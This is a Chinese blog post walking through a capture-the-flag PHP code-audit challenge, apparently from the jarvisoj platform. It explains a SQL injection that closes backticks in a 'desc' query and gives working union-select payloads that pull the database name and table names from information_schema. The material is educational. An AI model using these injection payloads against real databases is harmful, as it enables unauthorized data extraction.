PHP代码审计分段讲解(13)
代码审计分段讲解之29题,代码如下:
<?php require("config.php");
$table = $_GET['table']?$_GET['table']:"test";
$table = Filter($table);
mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
$sql = "select 'flag{xxx}' from secret_{$table}";
$ret = sql_query($sql);
echo $ret[0]; ?>
题目源自jarvisoj平台,环境在:http://web.jarvisoj.com:32794/
我们直接开始进行代码审计
包含config.php文件
require("config.php");
使用GET方式传入table,赋值给table,默认为test
接着对table进行过滤
$table = Filter($table);
这里的Filter函数是我们不知道的,不过不影响代码审计
接着是
mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
该行代码的意思为:
当mysqli_query()函数执行成功,则不调用Hacker()函数
当mysqli_query()函数执行失败,则调用Hacker()函数
对于mysqli_query函数的解释:
mysqli_query() 函数执行某个针对数据库的查询。//定义
mysqli_query(connection,query,resultmode);//语法
也就是说对链接的数据库执行desc 查询,我们又知道desc是用来查询表的结构的,如图:
又有:
从上图中可以看出来有:
desc xxx xxx;
desc `xxx` `xxx`
desc 'xxx' 'xxx'
desc "xxx" "xxx"
语句一和语句二是同样的效果,能够正常执行
语句三河语句四是同样的效果,均无法正常执行,所以我们通过闭合反引号来进行SQL语句的注入。
关于反引号,有:https://blog.csdn.net/u012546526/article/details/44568849
反引号 ` 在mysql中是为了区分mysql中的保留字符与普通字符而引入的符号
例如,如果test表中存在一个 from 字段,,当我们查找内容时,就需要使用反引号,以防使用保留字符而报错
select `from` from test
接下来的代码是一段SQL语句查询,并且输出第一个结果:
$ret = sql_query($sql);
echo $ret[0];
我们闭合反引号进行注入:
默认为:
desc `secret_test`
select 'flag{xxx}' from secret_test
查询数据库为:
desc `secret_test` `union select database() limit 1,1
select 'flag{xxx}' from secret_test` `union select database() limit 1,1
得知数据库为:
61d300
获取表
desc `secret_test` `union select group_concat(table_name) from information_schema.tables where table_schema=database() limit 1,1 select 'flag{xxx}' from secret_test` `union select group_concat(table_name) from information_schema.tables where table_schema=database() limit 1,1
得知表为
secret_flag,secret_test
后面的注入不再赘述。
提一下这个部分:
select 'flag{xxx}' from secret_test` `union select database() limit 1,1
这里的
secret_test` `union
关于中间的翻译好为什么没有影响到语句的执行,个人认为是因为两个反引号相当于了空格,后面的语句同理。
再提一下这个部分:
limit 1,1
因为可以看到代码最后是:
echo $ret[0];
因为只输出$ret[0],正常输出的话就是 flag{xxx},所以我们使用 limit 控制输出。
参考链接:
PHP代码审计分段讲解(13)的更多相关文章
- PHP代码审计分段讲解(14)
30题利用提交数组绕过逻辑 本篇博客是PHP代码审计分段讲解系列题解的最后一篇,对于我这个懒癌患者来说,很多事情知易行难,坚持下去,继续学习和提高自己. 源码如下: <?php $role = ...
- PHP代码审计分段讲解(11)
后面的题目相对于之前的题目难度稍微提升了一些,所以对每道题进行单独的分析 27题 <?php if(!$_GET['id']) { header('Location: index.php?id= ...
- PHP代码审计分段讲解(5)
11 sql闭合绕过 源代码为 <?php if($_POST[user] && $_POST[pass]) { $conn = mysql_connect("**** ...
- PHP代码审计分段讲解(1)
PHP源码来自:https://github.com/bowu678/php_bugs 快乐的暑期学习生活+1 01 extract变量覆盖 <?php $flag='xxx'; extract ...
- PHP代码审计分段讲解(12)
28题 <!DOCTYPE html> <html> <head> <title>Web 350</title> <style typ ...
- PHP代码审计分段讲解(10)
26 unserialize()序列化 <!-- 题目:http://web.jarvisoj.com:32768 --> <!-- index.php --> <?ph ...
- PHP代码审计分段讲解(9)
22 弱类型整数大小比较绕过 <?php error_reporting(0); $flag = "flag{test}"; $temp = $_GET['password' ...
- PHP代码审计分段讲解(8)
20 十六进制与数字比较 源代码为: <?php error_reporting(0); function noother_says_correct($temp) { $flag = 'flag ...
- PHP代码审计分段讲解(7)
17 密码md5比较绕过 <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ': ...
随机推荐
- C++常见的面试题目整理
本文列出C++面试中经常遇到的一些问题,都是一些常见的面试考点,如果后续遇到其他常见面试问题还会再次更新.希望对近期参加面试的同学有一些帮助.先后顺序与问题的重要性无关,查看的时候,最好是全面了解一下 ...
- tp3.2 php sdk上传七牛云
//获取上传token Vendor('sdk.autoload'); $accessKey='********'; $secretKey='*******'; $auth=new \Qiniu\Au ...
- C# Span 源码解读和应用实践
一:背景 1. 讲故事 这两天工作上太忙没有及时持续的文章产出,和大家说声抱歉,前几天群里一个朋友在问什么时候可以产出 Span 的下一篇,哈哈,这就来啦!读过上一篇的朋友应该都知道 Span 统一了 ...
- 谈谈AQS
AQS是什么? AQS全称叫AbstractQueuedSynchronizer,顾名思义,抽象的队列同步装置,在java中是一个抽象类.java JUC包下常用的同步类都是通过继承AQS实现的,那么 ...
- 【日拱一卒】链表——如何实现lru
LRU Redis的内存淘汰机制好几种,如ttl.random.lru. lru(less recently used)即最近最少使用策略,表示在最近一段时间内最少被使用到的Redis键,如果遇到内存 ...
- Vue3.0初体验
最近看了Vue3.0的相关信息,相比Vue2.0有以下优点: Performance:性能更比Vue 2.0强. Tree shaking support:可以将无用模块"剪辑", ...
- 关于“Failed to configure a DataSource: 'url' attribute is not specified and no embedded datasource could be configured.”
Consider the following: If you want an embedded database (H2, HSQL or Derby), please put it on the c ...
- mysql中delete from t1 where id = 10加锁状况叙述
在Next_Key Lock算法中,不仅仅锁定住所找到的索引,而且还锁定住这些索引覆盖的范围.因此在这个范围内的插入都是不允许的.这样就避免了在这个范围内插入数据导致的幻读问题. delete fro ...
- iOS Transform坐标变化
在使用CGContext时,由于Quartz 2D与UIKit坐标不一致,所以需要对context进行再一次的变化,达到预期的效果. 1. 不同坐标原点介绍 在Quartz 2D中,坐标原点在画布的左 ...
- Mysql预处理语句prepare、execute、deallocate
前言 做CTF题的时候遇到的所以参考资料学习一波.... MySQL的SQL预处理(Prepared) 一.SQL 语句的执行处理 1.即时 SQL 一条 SQL 在 DB 接收到最终执行完毕返回,大 ...